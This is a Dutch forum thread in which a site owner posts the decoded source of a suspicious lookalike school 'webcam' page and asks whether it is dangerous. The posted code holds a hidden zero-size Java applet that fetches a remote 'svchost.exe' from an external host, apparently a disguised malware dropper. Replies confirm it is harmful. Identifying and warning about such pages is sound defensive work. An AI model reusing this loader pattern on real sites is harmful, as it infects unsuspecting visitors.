login  Naam:   Wachtwoord: 
Registreer je!
 Forum

rare website?/

Offline Roow - 17/01/2011 11:45
Avatar van RoowLid via een eigen site kwam ik op een link (gepost door een user)
op de volgende site (NIET OP KLIKKEN, BETER EVEN EERST LEZEN)
Nu heb ik zelf geen idee of het gevaarlijk is of niet, maar omdat domeinnaam veel op die van mij leek keek ik naar de broncode en die was gecodeerd. Die kan je ook weer decoderen via een website en toen kwam er de volgende html code uit:
javascript code - Bekijk de code zonder highlighting - Klap code in 
  1. <Script Language='Javascript'>
  2. <!-- HTML Encryption provided by iWEBTOOL.com -->
  3. <!--
  4. document.write(unescape('<html>
  5.  <head>
  6.   <title> Erasmiaans Gymnasium internetwebcam</title>
  7.   <style type=text/css>
  8.   body {
  9.   background-color: white;
  10.   }
  11.   #box {
  12. 	border: 2px double white;
  13.         font-family: Verdana;
  14.         margin-right:160px;
  15.         margin-left:160px;
  16.         background-color: white;
  17. 	}
  18.   </style>
  19.  </head>
  20.  <body>
  21.   <br><br><br><br>
  22.   <center>
  23.   <div id="box"><br><br><img src="erasmianen.PNG" /><br><br><br><br><pre>                                            </pre><img src="load.gif" /><br><br><b>Druk op Run om de internetcam te starten!</b><br><br><br><br><br><br><br><br></div>
  24.   <img src="banner.png" />
  25.   </center>
  26.  </body>
  27. </html>
  28.  
  29. <APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
  30. 	<PARAM NAME = "AMLMAFOIEA" VALUE = "http://erasmianen.fileave.com/svchost.exe">
  31. </APPLET>
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38. '));
  39. //-->
  40. </Script>


Iemand weet of dit gevaarlijk is of niet (link is trouwens www.erasmianen.tk, maar zoals gezegd, beter om er niet heen te gaan denk ik zo)

8 antwoorden

Gesponsorde links
Offline Joel - 17/01/2011 12:01 (laatste wijziging 17/01/2011 12:01)
Avatar van Joel Eigenaar Wat zou er gevaarlijk moeten zijn? Code die geëncrypteerd is? Dat doen ze meestal omdat ze niet willen dat code niet "kan" gekopiëerd worden.

Kan je in het vervolg je vraag iets duidelijker stellen + een betere titel kiezen. Ik vind "rare website?/" niet zo'n duidelijke titel...

Groeten

Joël
Offline Berten - 17/01/2011 12:13
Avatar van Berten PHP beginner Het feit dat er een java applet wordt ingeladen op een site die dezelfde url heeft lijkt me toch wel te rieken naar iets fishy
Offline Roow - 17/01/2011 12:23
Avatar van Roow Lid misschien een beetje onduidelijk.

Ik heb de site www.erasmianen.nl , zij hebben www.erasmianen.tk en die link is gepost op erasmianen.nl

Dat ik het raar vind is dat zij het aankondigen als een webcam voor in de school(erasmianen.nl is een school site voor samenvattingen. De school waar het omgaat is het erasmiaans gymnasium), en dat er meerdere mensen commentaar op geven (ongeveer van: oh wat leuk, ik zie alle leraren) terwijl die mensen zelf van niks weten, en die hele applicatie ook nog eens niet werkt. Plus dat svchost.exe.

De vraag is dus: kan dit schadelijk zijn voor mensen die die site bezoeken, en wat willen ze ermee doen?
Offline WimJ - 17/01/2011 13:10
Avatar van WimJ Grafische gevorderde <APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "http://erasmianen.fileave.com/svchost.exe">
</APPLET>

Neen hoor .. echt niet gevaarlijk (SARCASM ON)
Je kan dat vergelijken met van die porn fishing site's, geven een thumbnail weer van een videoplayer met een porn image er in, maar onclick krijgt de user een file te downloaden in de aard van 'pornmovie1.mpeg.exe' geen normaal mens, dat het in de gaten heeft, maar mensen met verstand van files en computers weten beter.

Zodus ja dit is schadelijk.
Offline zointer - 17/01/2011 13:14 (laatste wijziging 17/01/2011 13:14)
Avatar van zointer HTML gevorderde Bij mij word die tk site geblokkeerd door mijn virussoft.
svchost.exe = Generic Host Process for Win32 Services
Offline Roow - 17/01/2011 13:26
Avatar van Roow Lid Maar in hoeverre wordt het gedownloaded. Moet diegene op "ja / RUn" ofzoiets klikken?

Ik heb wel het IP weten te achterhalen van diegene, want drie verschillende mensen, die elkaarn iet kennen hebben ingelogd met hetzelfde ip binnen 5 minuten.

Echter het ipadres komt ergens uit Amerika, dus dat zal via een proxy zijn gegaan. Is hier sprake geweest van een sql injection? zoja kan je dat aan iets zien?? (buiten de gevallen met wachtwoord veranderd??)
Offline WimJ - 17/01/2011 13:30
Avatar van WimJ Grafische gevorderde Excuseer maar het staat toch op een externe site (gewoon met een zelfde naam, maar andere domein extensie)?
Offline zointer - 17/01/2011 13:32
Avatar van zointer HTML gevorderde
Roow schreef:
Maar in hoeverre wordt het gedownloaded. Moet diegene op "ja / RUn" ofzoiets klikken?

Wat denk je zelf 
Roow schreef:
Ik heb wel het IP weten te achterhalen van diegene, want drie verschillende mensen, die elkaarn iet kennen hebben ingelogd met hetzelfde ip binnen 5 minuten.

Echter het ipadres komt ergens uit Amerika, dus dat zal via een proxy zijn gegaan.

wat ga je daar mee doen 
Roow schreef:
Is hier sprake geweest van een sql injection? zoja kan je dat aan iets zien?? (buiten de gevallen met wachtwoord veranderd??)


SQL-injectie
Gesponsorde links
Je moet ingelogd zijn om een reactie te kunnen posten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.16s